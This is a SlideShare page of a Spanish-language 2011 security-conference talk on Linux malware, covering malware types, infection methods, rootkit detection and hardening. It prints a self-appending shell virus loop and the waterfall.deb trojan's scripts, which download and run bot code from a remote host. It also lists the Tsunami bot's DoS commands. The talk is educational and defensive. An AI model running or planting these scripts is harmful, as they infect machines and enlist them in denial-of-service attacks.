<ul>Malware For Linux </ul><ul>Amilcar de León </ul>[email_address] Esta obra está liberada bajo una licencia Creative Com...
<ul><li>Malware :  es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimient...
Tipos de Malware <ul><li>Virus : tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el ...
Tipos de Malware <ul><li>Gusanos : es un programa que se  reproduce  a sí mismo, explotando vulnerabilidades, en una red d...
Tipos de Malware <ul><li>Toryanos : </li></ul><ul><ul><li>Finjen ser software no dañino, incluso vienen acomopañados de ap...
permite la administración remota de una computadora, de forma oculta y sin el consentimiento de su propietario, por parte ...
Suelen servir para instalar gusanos, spyware sin/con consentimiento del usuario (licencias). </li></ul></ul>
Tipos de Malware <ul><li>Spyware, AdWare : </li></ul><ul><ul><li>recopilan información  sobre las actividades realizadas p...
Muestran publicidad no deseada. </li></ul></ul>
Tipos de Malware <ul><li>Backdoors: </li></ul><ul><ul><li>Elude métodos tradicionales de autenticación
Provee acceso remoto a malechores
Pueden ser instaladas a través de otro malware (virus, gusano).
Acceso para permanecer ocultos y ejecutar X comandos. </li></ul></ul>
Tipos de Malware <ul><li>Rootkits </li></ul><ul><ul><li>Proviene de “root” de Sistemas Unix, para obtener acceso a éste.
Modifican el sistema operativo para que el malware permanezca oculto al usuario, a nivel de procesos/rutinas.
Puede contener capacidades que impiden la eliminación del código malicioso.
Ejemplo 2 procesos-fantasmas: deben detectar que el otro ha sido terminado e iniciar una nueva instancia en cuestión de mi...
Tipos de Malware <ul><li>Ataques distribuidos: BotNets </li></ul><ul><ul><li>Redes de computadoras infectadas por malware ...
Spam, DoS.
Mantienen el anonimato. </li></ul></ul>
Primer Virus – sobre Unix
Estadísticas de SO -  Escritorio Fuente:  http://marketshare.hitslink.com Noviembre 2011
 
¿Por qué Windows? <ul><li>Popularidad
Alianzas estratégicas (monopolio?!)
Drivers </li></ul>
¿Y en Servidores?
Estadística SO – Servidores (supercomputadoras!) Fuente:  www.top500.com Noviembre 2011
Status Quo del Malware Fuente: viruslist.com, 2009
<ul>Métodos de Infección </ul>
Malware Linux: programación shell <ul>#!/bin/sh for archivo in * do tail -4 $0 >> archivo done </ul>
Malware Linux: archivos ELF
Malware Linux: archivos ELF Método  Silvio Cesare
Malware Linux: paquetes de distribuciones (deb, rpm, otros) <ul><li>Ejecutables, fácil instalación.
Necesitamos privilegios de  root . </li></ul>
Malware Linux: waterfall.deb <ul><li>Troyano
Año 2009
Gnome-look.org </li></ul>
Upcoming SlideShare
Loading in...5
×

Malware for Linux

832

Published on

Research about Malware for Linux. This presentation was made for the Guatemalan ExploitSec Security Conference November 2011. This presentation is based on the research "Seguridad (GNU) Linux: malware, vulnerrabilidades, protección y otros recursos" that got the second price at Latin American Level for the contest "AV Security" sponsored by ESET Latinoamerica. Enjoy!

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
832
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
23
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Algunos de los datos que recogen son las páginas web que visita el usuario y direcciones de e_mail, a las que después se envía spam. Otros programas spyware recogen la información mediante cookies de terceros o barras de herramientas instaladas en navegadores web.
  • Las botnets son redes de computadoras infectadas, también llamadas &amp;quot;zombies&amp;quot;, que pueden ser controladas a la vez por un individuo y realizan distintas tareas. Este tipo de redes son usadas para el envío masivo de spam o para lanzar ataques DDoS contra organizaciones como forma de extorsión o para impedir su correcto funcionamiento. La ventaja que ofrece a los spammers el uso de ordenadores infectados es el anonimato, que les protege de la persecución policial. En una botnet cada computadora infectada por el malware se loguea en un canal de IRC u otro sistema de chat desde donde el atacante puede dar instrucciones a todos los sistemas infectados simultáneamente. Las botnets también pueden ser usadas para actualizar el malware en los sistemas infectados manteniéndolos así resistentes ante antivirus u otras medidas de seguridad.
  • Malware for Linux

    1. 1. <ul>Malware For Linux </ul><ul>Amilcar de León </ul>[email_address] Esta obra está liberada bajo una licencia Creative Commons Atribución-Compartir-Igual 3.0 Guatemala
    2. 2. <ul><li>Malware : es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término virus informático es utilizado en muchas ocasiones de forma incorrecta para referirse a todos los tipos de malware, incluyendo los verdaderos virus. </li></ul>¿Virus ó Malware?
    3. 3. Tipos de Malware <ul><li>Virus : tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Tienen, básicamente, la función de propagarse a través de un software (ej: autorun.info). Necesita intervención del usuario. </li></ul>
    4. 4. Tipos de Malware <ul><li>Gusanos : es un programa que se reproduce a sí mismo, explotando vulnerabilidades, en una red de computadoras para infectar otros equipos. El principal objetivo es infectar a la mayor cantidad de usuarios posible, también puede contener instrucciones dañinas al igual que los virus. No necesita intervención del usuario. </li></ul>
    5. 5. Tipos de Malware <ul><li>Toryanos : </li></ul><ul><ul><li>Finjen ser software no dañino, incluso vienen acomopañados de aplicaciones no dañinas.
    6. 6. permite la administración remota de una computadora, de forma oculta y sin el consentimiento de su propietario, por parte de un usuario no autorizado.
    7. 7. Suelen servir para instalar gusanos, spyware sin/con consentimiento del usuario (licencias). </li></ul></ul>
    8. 8. Tipos de Malware <ul><li>Spyware, AdWare : </li></ul><ul><ul><li>recopilan información sobre las actividades realizadas por un usuario y distribuirla a agencias de publicidad u otras organizaciones interesadas.
    9. 9. Muestran publicidad no deseada. </li></ul></ul>
    10. 10. Tipos de Malware <ul><li>Backdoors: </li></ul><ul><ul><li>Elude métodos tradicionales de autenticación
    11. 11. Provee acceso remoto a malechores
    12. 12. Pueden ser instaladas a través de otro malware (virus, gusano).
    13. 13. Acceso para permanecer ocultos y ejecutar X comandos. </li></ul></ul>
    14. 14. Tipos de Malware <ul><li>Rootkits </li></ul><ul><ul><li>Proviene de “root” de Sistemas Unix, para obtener acceso a éste.
    15. 15. Modifican el sistema operativo para que el malware permanezca oculto al usuario, a nivel de procesos/rutinas.
    16. 16. Puede contener capacidades que impiden la eliminación del código malicioso.
    17. 17. Ejemplo 2 procesos-fantasmas: deben detectar que el otro ha sido terminado e iniciar una nueva instancia en cuestión de milisegundos. Deben matarse ambos procesos simultáneamente. </li></ul></ul>
    18. 18. Tipos de Malware <ul><li>Ataques distribuidos: BotNets </li></ul><ul><ul><li>Redes de computadoras infectadas por malware (zombies).
    19. 19. Spam, DoS.
    20. 20. Mantienen el anonimato. </li></ul></ul>
    21. 21. Primer Virus – sobre Unix
    22. 22. Estadísticas de SO - Escritorio Fuente: http://marketshare.hitslink.com Noviembre 2011
    23. 24. ¿Por qué Windows? <ul><li>Popularidad
    24. 25. Alianzas estratégicas (monopolio?!)
    25. 26. Drivers </li></ul>
    26. 27. ¿Y en Servidores?
    27. 28. Estadística SO – Servidores (supercomputadoras!) Fuente: www.top500.com Noviembre 2011
    28. 29. Status Quo del Malware Fuente: viruslist.com, 2009
    29. 30. <ul>Métodos de Infección </ul>
    30. 31. Malware Linux: programación shell <ul>#!/bin/sh for archivo in * do tail -4 $0 >> archivo done </ul>
    31. 32. Malware Linux: archivos ELF
    32. 33. Malware Linux: archivos ELF Método Silvio Cesare
    33. 34. Malware Linux: paquetes de distribuciones (deb, rpm, otros) <ul><li>Ejecutables, fácil instalación.
    34. 35. Necesitamos privilegios de root . </li></ul>
    35. 36. Malware Linux: waterfall.deb <ul><li>Troyano
    36. 37. Año 2009
    37. 38. Gnome-look.org </li></ul>
    38. 39. Malware Linux: waterfall.deb Waterfall.deb ( infected ) Instalar/Ejecutar como root Sistema Infectado!
    39. 40. Malware Linux: waterfall.deb <ul><li>Waterfall.deb descarga un segundo fichero auto.sh
    40. 41. Auto.sh se ejecuta con privilegios de root
    41. 42. Crea archivo gnome.sh en /etc/profile.d
    42. 43. gnome.sh contiene código que permite enviar grandes paquetes de datos a un servidor remoto.
    43. 44. Con ésto se permite la participación de la computadora para un ataque DoS. </li></ul>
    44. 45. Malware Linux: waterfall.deb <ul>#!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit </ul>
    45. 46. Malware Linux: waterfall.deb <ul>while do rm /usr/bin/run.bash cd /usr/bin/ wget http://05748.t35.com/Bots/index.php wget http://05748.t35.com/Bots/run.bash sleep 4 rm index.php chmod 755 run.bash command -p /usr/bin/run.bash done </ul>Auto.sh
    46. 47. Malware Linux: backdoor ELF/Tsunami <ul><li>Infecta con Unix/Linux embebidos.
    47. 48. Deposita un ELF en el sistema infectado que obtiene contraseña root por medio de fuerza bruta, creando un usuario fantasma con privilegios de root.
    48. 49. Una vez dentro del router, se conecta a un canal IRC donde descarga versiones actualizadas de sí mismo.
    49. 50. Luego, el atacante puede ejecutar varios comandos maliciosos.
    50. 51. Verifica modelo/version de router para aprovecharse de vulnerabilidades. </li></ul>
    51. 52. Malware Linux: backdoor ELF/Tsunami <ul>. login [password]: permite acceso al bot. . logout : permite al bot desloguearse. . exec : ejecuta un comando de sistema. TSUNAMI [TARGET] [secs]: éste comando hace que bot ejecute un ataque de denegación de servicios (DoS) hacia un blanco específico enviando paquetes en intervalos de N segundos. </ul>
    52. 53. Malware Linux: rootkits <ul><li>A nivel de Usuario :
    53. 54. Es el tipo más simple de detectar y por consiguiente de </li></ul><ul>eliminar. <li>Típicamente reemplazan una aplicación de usuario por un programa que éstos han modificado por su propia cuenta. Éstos son fáciles – relativamente – de detectar porque porque el kernel no sufre alteraciones y por ésta razón continúa siendo confiable. </li></ul>
    54. 55. Malware Linux: rootkits <ul>2. A nivel de Sistema : éste tipo es más complejo ya que se dificulta su detección </ul><ul>porque algún componente del kernel ha sufrido alteraciones y éste último deja de ser confiable. <li>Éstos rootkits tienen la capacidad de eliminar los logs del atacante intruso e incluso reemplazar las llamadas de sistema (syscalls). </li></ul>
    55. 56. Detección de Rootkits <ul><li>Revisión de integridad de archivos
    56. 57. Tripwire
    57. 58. Rpm --verify </li></ul>
    58. 59. Fallos y/o vulnerabilidades en aplicaciones sobre SO <ul><li>45% de los defectos descubiertos en proyectos de código abierto son considerados defectos de alto riesto.
    59. 60. Pueden ser defectos severos que podrían resultar en brechas de seguridad.
    60. 61. De un análisis de 5.7 mi de líneas de código, se encuentra un promedio de 0.17 fallos por cada 1000 líneas de código.
    61. 62. Software propietario tiene un promedio de 20/30 por cada 1000 líneas.
    62. 63. Modelo de desarrollo Open Source detecta y resuelve bugs más rápido. </li></ul>Fuente: Coverity Scan: Open Source Integrity Report
    63. 64. Backdoor en vsftp <ul><li>Código malicioso que contenía un troyano.
    64. 65. Se activa cuando el usuario ingresa determinados caracteres.
    65. 66. Abre un socket en el puerto 6200 y el atacante podría ingresar tecleando simplemente el caracter ingresado previamente.
    66. 67. Flash player (ajeno a vsftp). </li></ul>
    67. 68. Conclusiones <ul><li>Linux es seguro, a medida que se conoce su funcionamiento y sus vulnerabilidades, para poder prevenir ó mitigar situaciones.
    68. 69. No pecar, sensación de falsa seguridad.
    69. 70. Tipo de target Linux a nivel de servidor y escritorio.
    70. 71. Debe haber seguridad, física, lógica y a nivel de usuario.
    71. 72. Iptables, SELinux, Grsecurity, Bastille Linux, AV.
    72. 73. Nunca terminamos un proyecto de seguridad.
    73. 74. Todo es relativo según la tendencia... </li></ul>
    74. 77. ” La Seguridad no es un producto, es un proceso” <ul>Bruce Schneier </ul>
    75. 78. <ul>Gracias! </ul><ul><li>[email_address]
    76. 79. Http://adario.antigualug.org </li></ul>
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×